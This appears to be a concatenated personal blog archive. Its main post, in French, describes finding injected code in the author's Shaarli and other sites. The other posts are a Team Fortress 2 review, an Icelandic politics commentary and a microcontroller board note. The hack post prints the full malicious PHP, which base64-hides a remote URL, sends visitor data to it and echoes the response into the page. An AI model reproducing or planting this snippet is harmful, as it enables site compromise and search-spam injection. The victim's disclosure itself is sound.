Hier soir, j’essaie de me connecter sur mon shaarli. Et là surprise : Erreur php ligne 41.

WTF?

Alors je me logge sur mon ftp et je regarde mon dossier shaarli. Et que vois-je : le fichier index.php a été édité le matin.

Je l’ouvre et cherche cette ligne 41. J’y trouve un code dont je n’arrive pas à comprendre l’utilité, pour finalement voir en comparaison avec le code original, qu’un pargraphe a été ajouté dans le code de shaarli. Voici les lignes en question:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

 La ligne intéressante dans ce bordel, c’est celle avec le base64_decode(), cela donne une URL vers un site à la con qui récupère un paquet d’infos  et doit surement en conséquence lancer une action à la mords-moi-le-noeud sur ma machine.

Petite inspection, tous mes autres dossiers ont été touchés, le wiki et mon projet perso Reflux inclus.

Y A UN FUCKING TYPE QUI A FUCKING SALOPE MON CHEZ MOI AVEC DU FUCKING SALE CODE ! FUCK !

Il semblerait que le mec se soit connecté en FTP, mais je ne trouve pas de trace dans les logs.

Bordel de couille d’ours ! Me suis fait avoir ! Damned que je n’aime pas ça.

J’ai nettoyé tous les fichiers touchés, et changé tous mes mots de passe. Ca fait bizarre, je ne sais pas si ca vient de mon hébergeur, de moi ou d’un autre PC infecté. Mais je me sens sale!

Edit : Il semblerait que ce soit un hack visant surtout le référencement de google, dont le but est de substituer un lien à un autre: http://www.peterrosenmai.com/a-hacking-visible-only-to-google

This Article is also available in John.

Can’t stop playing Team Fortress 2. Any other FPS those days brings me back to my beloved Red and Blue mates. But what are the reasons that make this game so addictive? What’s this terrific success linked to? What are the assets and design decisions that makes it that awesome? I’ve got my idea, check it out.

1 – 100% Original background :
This epic, esthetically fun-shaped universe is mind blowing. Characters design, level design, global athmosphere, everything fit perfectly well altogether. That’s all about being epically seriously crazy, you get it?The Medic is awesomely German styled, the Heavy is awesomely dumb, the Engineer is awesomely Texan and the Pyro is awesomely mphmmhphmmh.

2 - Differentiated and situation balanced classes gameplay
When it comes to gameplay, the picture is the same : all classes gameplay strongly differs in style and balances with each other. Synergys are everywhere, and provide combinations to feed both casual and epic players.

3 – Easy to be good at / Hard to master
It’s easy to strike a successfull Rocket into a heavy/medic pack, but it’s damn hard to master accurates airshots during critical encounters. It’s all about teamplay and positive exploit of class synergies, that this game excells at providing. This game is both fun for a 15 minutes afterwork session, and a 2 hours relentless clan war.

4 – 0% Assault Rifle  inside :
No AK or M14 that makes multiplayer FPS boringly distance-oriented
This is not immediate to feel, but definitely makes the point here. In real life battles, Assault Rifles are strong weapons that combine rifle power with the bullet load of a SMG. Those weapons are overpowered in games as well and make FPS boringly mid/far distance oriented, where visual contact is stressed to a minimum thanks to the fire power and accuracy of those babys. But in TF2, none of those are present. As a consequence, battle is heavily contact oriented and weapons focus on close range damaging (shotguns and dispersion guns). At the extremes, you find either the Pyro buddy, and the sniper.

These are the main assets of the balanced, fun and addictive game that is Team Fortress 2.

Background, Fun, Skill and Assault Rifles

Deux ans après l’engouement pour la « Révolution du Peuple », on n’entend plus parler de l’Islande. Ce pays qui a osé dire non aux créanciers privés, qui a envoyé les banquiers et dignitaires corrompus se faire voir n’a plus de visibilité au sein de l’UE. La presse se taît, et c’est dans la presse étrangère que l’on trouve des  infos. De quoi faire taire le succès, certes limité mais ô combien symbolique, de cette révolution populaire.

http://www.granma.cu/frances/internationales/2agos-omerta%20sur.html

En corrélant avec d’autres médias, la principale conclusion que l’on peut en tirer est que contrairement à ce que l’on nous fait miroiter, dire aux banquiers et créanciers d’aller se faire voir n’est pas une catastrophe en soi. C’est même la meilleure façon de mettre en lumière ceux qui profitent du système de « la crise » et de les renvoyer à leurs responsabilités. Intéressant.

http://www.atlantico.fr/decryptage/democratie-islandaise-plus-forte-que-banquiers-comment-politique-reprend-pouvoir-economique-olivier-demeulenaere-426655.html?page=0,1

A la décharge de l’évènement, les principaux arguments sont :
- ce qui se passe dans un pays dont la population est équivalente à celle de la ville de Toulouse n’est pas applicable mis à l’échelle d’un pays 100 fois plus peuplé.
- la mise à mal de la dette privée ne couvre pas les déboires de la dette publique. 

http://globalpresse.wordpress.com/2012/07/16/la-justice-islandaise-donne-raison-a-wikileaks/
http://www.france24.com/fr/20111215-islande-processus-paix-etat-palestinien-palestine-creation-mahmoud-abbas-president

Le pouvoir au peuple permet de grandes décisions que la communauté internationale oligarchique a bien du mal à ne serait ce que dessiner à plusieurs.

Bref, quand l’état francais se gargarise de la fierté de voir les états Nord Africains vivre leurs révolutions de jasmin, il s’étouffe et prie que le peuple ne regarde pas un peu plus vers le nord, là ou les journées s’allongent et les esprits se libèrent.

(source image carte diplomatique  :  http://diplomatie.gouv.fr)

Here it is, my brand new Maple V5 Board.

I can’t wait to make those shiny 90 DMIPS to overkill my synth design dreams…

But wait, I have a SIDaster to release first. This one will be used afterwards. But the guys from Wetterott are incredibly fast, trust me !